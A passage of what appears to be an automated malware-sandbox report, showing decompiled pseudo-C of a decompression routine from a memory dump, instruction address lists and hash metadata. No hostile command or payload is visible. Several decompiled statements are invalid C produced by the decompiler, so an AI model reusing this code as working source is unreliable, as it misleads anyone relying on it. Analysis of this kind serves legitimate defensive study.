              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              													goto L170;
              												}
              												L121:
              												__eflags = __eax -  *(__ebp - 0x60);
              												if(__eax >  *(__ebp - 0x60)) {
              													goto L171;
              												}
              												L122:
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              												__eax =  *(__ebp - 0x30);
              												_t400 = __ebp - 0x60;
              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              												__eflags =  *_t400;
              												goto L123;
              											}
              											L95:
              											__ecx = __ebx;
              											__eax = __ebx;
              											__ecx = __ebx >> 1;
              											__eax = __ebx & 0x00000001;
              											__ecx = (__ebx >> 1) - 1;
              											__al = __al | 0x00000002;
              											__eax = (__ebx & 0x00000001) << __cl;
              											__eflags = __ebx - 0xe;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ebx >= 0xe) {
              												L97:
              												__ebx = 0;
              												 *(__ebp - 0x48) = __ecx;
              												L102:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													L107:
              													__eax = __eax + __ebx;
              													 *(__ebp - 0x40) = 4;
              													 *(__ebp - 0x2c) = __eax;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x644;
              													__eflags = __eax;
              													L108:
              													__ebx = 0;
              													 *(__ebp - 0x58) = __eax;
              													 *(__ebp - 0x50) = 1;
              													 *(__ebp - 0x44) = 0;
              													 *(__ebp - 0x48) = 0;
              													L112:
              													__eax =  *(__ebp - 0x40);
              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              														L118:
              														_t391 = __ebp - 0x2c;
              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
              														__eflags =  *_t391;
              														goto L119;
              													}
              													L113:
              													__eax =  *(__ebp - 0x50);
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              													__eax =  *(__ebp - 0x58);
              													__esi = __edi + __eax;
              													 *(__ebp - 0x54) = __esi;
              													__ax =  *__esi;
              													__ecx = __ax & 0x0000ffff;
              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              													__eflags =  *(__ebp - 0xc) - __edx;
              													if( *(__ebp - 0xc) >= __edx) {
              														__ecx = 0;
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              														__ecx = 1;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              														__ebx = 1;
              														__ecx =  *(__ebp - 0x48);
              														__ebx = 1 << __cl;
              														__ecx = 1 << __cl;
              														__ebx =  *(__ebp - 0x44);
              														__ebx =  *(__ebp - 0x44) | __ecx;
              														__cx = __ax;
              														__cx = __ax >> 5;
              														__eax = __eax - __ecx;
              														__edi = __edi + 1;
              														__eflags = __edi;
              														 *(__ebp - 0x44) = __ebx;
              														 *__esi = __ax;
              														 *(__ebp - 0x50) = __edi;
              													} else {
              														 *(__ebp - 0x10) = __edx;
              														0x800 = 0x800 - __ecx;
              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              														 *__esi = __dx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L111:
              														_t368 = __ebp - 0x48;
              														 *_t368 =  *(__ebp - 0x48) + 1;
              														__eflags =  *_t368;
              														goto L112;
              													} else {
              														L117:
              														goto L109;
              													}
              												}
              												L103:
              												__ecx =  *(__ebp - 0xc);
              												__ebx = __ebx + __ebx;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              													__ecx =  *(__ebp - 0x10);
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													__ebx = __ebx | 0x00000001;
              													__eflags = __ebx;
              													 *(__ebp - 0x44) = __ebx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													L101:
              													_t338 = __ebp - 0x48;
              													 *_t338 =  *(__ebp - 0x48) - 1;
              													__eflags =  *_t338;
              													goto L102;
              												} else {
              													L106:
              													goto L99;
              												}
              											}
              											L96:
              											__edx =  *(__ebp - 4);
              											__eax = __eax - __ebx;
              											 *(__ebp - 0x40) = __ecx;
              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              											goto L108;
              										case 0x1a:
              											L56:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												L162:
              												 *(__ebp - 0x88) = 0x1a;
              												goto L170;
              											}
              											L57:
              											__ecx =  *(__ebp - 0x68);
              											__al =  *(__ebp - 0x5c);
              											__edx =  *(__ebp - 8);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              											 *( *(__ebp - 0x68)) = __al;
              											__ecx =  *(__ebp - 0x14);
              											 *(__ecx +  *(__ebp - 8)) = __al;
              											__eax = __ecx + 1;
              											__edx = 0;
              											_t192 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t192;
              											goto L80;
              										case 0x1b:
              											L76:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												L163:
              												 *(__ebp - 0x88) = 0x1b;
              												goto L170;
              											}
              											L77:
              											__eax =  *(__ebp - 0x14);
              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              											__eflags = __eax -  *(__ebp - 0x74);
              											if(__eax >=  *(__ebp - 0x74)) {
              												__eax = __eax +  *(__ebp - 0x74);
              												__eflags = __eax;
              											}
              											__edx =  *(__ebp - 8);
              											__cl =  *(__eax + __edx);
              											__eax =  *(__ebp - 0x14);
              											 *(__ebp - 0x5c) = __cl;
              											 *(__eax + __edx) = __cl;
              											__eax = __eax + 1;
              											__edx = 0;
              											_t275 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t275;
              											__eax =  *(__ebp - 0x68);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											_t284 = __ebp - 0x64;
              											 *_t284 =  *(__ebp - 0x64) - 1;
              											__eflags =  *_t284;
              											 *( *(__ebp - 0x68)) = __cl;
              											L80:
              											 *(__ebp - 0x14) = __edx;
              											goto L81;
              										case 0x1c:
              											while(1) {
              												L123:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													break;
              												}
              												L124:
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t414 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t414;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              												__eflags =  *(__ebp - 0x30);
              												 *( *(__ebp - 0x68)) = __cl;
              												 *(__ebp - 0x14) = _t414;
              												if( *(__ebp - 0x30) > 0) {
              													continue;
              												} else {
              													L127:
              													L81:
              													 *(__ebp - 0x88) = 2;
              													goto L1;
              												}
              											}
              											L167:
              											 *(__ebp - 0x88) = 0x1c;
              											goto L170;
              									}
              								}
              								L171:
              								_t539 = _t538 | 0xffffffff;
              								goto L172;
              							}
              						}
              					}
              				}
              			}















              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x00407018
              0x0040701c
              0x00407023
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407291
              0x00407295
              0x004072b7
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00407297
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00407399
              0x00407354
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x0040743f
              0x00407442
              0x00407343
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00000000
              0x00407079
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00407399
              0x00000000
              0x00000000
              0x00000000
              0x004070be
              0x004070be
              0x004070c1
              0x004070f7
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x00407157
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c3
              0x0040738c

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
              • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00407291() {
              				void _t533;
              				signed int _t534;
              				signed int _t535;
              				signed int* _t605;
              				void* _t612;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t612 - 0x40) != 0) {
              						 *(_t612 - 0x84) = 0x13;
              						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
              						goto L132;
              					} else {
              						__eax =  *(__ebp - 0x4c);
              						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              						__ecx =  *(__ebp - 0x58);
              						__eax =  *(__ebp - 0x4c) << 4;
              						__eax =  *(__ebp - 0x58) + __eax + 4;
              						L130:
              						 *(__ebp - 0x58) = __eax;
              						 *(__ebp - 0x40) = 3;
              						L144:
              						 *(__ebp - 0x7c) = 0x14;
              						L145:
              						__eax =  *(__ebp - 0x40);
              						 *(__ebp - 0x50) = 1;
              						 *(__ebp - 0x48) =  *(__ebp - 0x40);
              						L149:
              						if( *(__ebp - 0x48) <= 0) {
              							__ecx =  *(__ebp - 0x40);
              							__ebx =  *(__ebp - 0x50);
              							0 = 1;
              							__eax = 1 << __cl;
              							__ebx =  *(__ebp - 0x50) - (1 << __cl);
              							__eax =  *(__ebp - 0x7c);
              							 *(__ebp - 0x44) = __ebx;
              							while(1) {
              								L140:
              								 *(_t612 - 0x88) = _t533;
              								while(1) {
              									L1:
              									_t534 =  *(_t612 - 0x88);
              									if(_t534 > 0x1c) {
              										break;
              									}
              									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              										case 0:
              											if( *(_t612 - 0x6c) == 0) {
              												goto L170;
              											}
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
              											_t534 =  *( *(_t612 - 0x70));
              											if(_t534 > 0xe1) {
              												goto L171;
              											}
              											_t538 = _t534 & 0x000000ff;
              											_push(0x2d);
              											asm("cdq");
              											_pop(_t569);
              											_push(9);
              											_pop(_t570);
              											_t608 = _t538 / _t569;
              											_t540 = _t538 % _t569 & 0x000000ff;
              											asm("cdq");
              											_t603 = _t540 % _t570 & 0x000000ff;
              											 *(_t612 - 0x3c) = _t603;
              											 *(_t612 - 0x1c) = (1 << _t608) - 1;
              											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
              											_t611 = (0x300 << _t603 + _t608) + 0x736;
              											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
              												L10:
              												if(_t611 == 0) {
              													L12:
              													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
              													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
              													goto L15;
              												} else {
              													goto L11;
              												}
              												do {
              													L11:
              													_t611 = _t611 - 1;
              													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
              												} while (_t611 != 0);
              												goto L12;
              											}
              											if( *(_t612 - 4) != 0) {
              												GlobalFree( *(_t612 - 4));
              											}
              											_t534 = GlobalAlloc(0x40, 0x600); // executed
              											 *(_t612 - 4) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
              												goto L10;
              											}
              										case 1:
              											L13:
              											__eflags =  *(_t612 - 0x6c);
              											if( *(_t612 - 0x6c) == 0) {
              												 *(_t612 - 0x88) = 1;
              												goto L170;
              											}
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
              											_t45 = _t612 - 0x48;
              											 *_t45 =  *(_t612 - 0x48) + 1;
              											__eflags =  *_t45;
              											L15:
              											if( *(_t612 - 0x48) < 4) {
              												goto L13;
              											}
              											_t546 =  *(_t612 - 0x40);
              											if(_t546 ==  *(_t612 - 0x74)) {
              												L20:
              												 *(_t612 - 0x48) = 5;
              												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
              												goto L23;
              											}
              											 *(_t612 - 0x74) = _t546;
              											if( *(_t612 - 8) != 0) {
              												GlobalFree( *(_t612 - 8));
              											}
              											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
              											 *(_t612 - 8) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												goto L20;
              											}
              										case 2:
              											L24:
              											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
              											 *(_t612 - 0x84) = 6;
              											 *(_t612 - 0x4c) = _t553;
              											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
              											goto L132;
              										case 3:
              											L21:
              											__eflags =  *(_t612 - 0x6c);
              											if( *(_t612 - 0x6c) == 0) {
              												 *(_t612 - 0x88) = 3;
              												goto L170;
              											}
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											_t67 = _t612 - 0x70;
              											 *_t67 =  &(( *(_t612 - 0x70))[1]);
              											__eflags =  *_t67;
              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
              											L23:
              											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
              											if( *(_t612 - 0x48) != 0) {
              												goto L21;
              											}
              											goto L24;
              										case 4:
              											L133:
              											_t531 =  *_t605;
              											_t588 = _t531 & 0x0000ffff;
              											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
              											if( *(_t612 - 0xc) >= _t564) {
              												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
              												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
              												 *(_t612 - 0x40) = 1;
              												_t532 = _t531 - (_t531 >> 5);
              												__eflags = _t532;
              												 *_t605 = _t532;
              											} else {
              												 *(_t612 - 0x10) = _t564;
              												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
              												 *_t605 = (0x800 - _t588 >> 5) + _t531;
              											}
              											if( *(_t612 - 0x10) >= 0x1000000) {
              												goto L139;
              											} else {
              												goto L137;
              											}
              										case 5:
              											L137:
              											if( *(_t612 - 0x6c) == 0) {
              												 *(_t612 - 0x88) = 5;
              												goto L170;
              											}
              											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
              											L139:
              											_t533 =  *(_t612 - 0x84);
              											goto L140;
              										case 6:
              											__edx = 0;
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) = 1;
              												 *(__ebp - 0x84) = 7;
              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
              											__esi =  *(__ebp - 0x60);
              											__cl = 8;
              											__cl = 8 -  *(__ebp - 0x3c);
              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              											__ecx =  *(__ebp - 0x3c);
              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              											__ecx =  *(__ebp - 4);
              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              											__eflags =  *(__ebp - 0x38) - 4;
              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											if( *(__ebp - 0x38) >= 4) {
              												__eflags =  *(__ebp - 0x38) - 0xa;
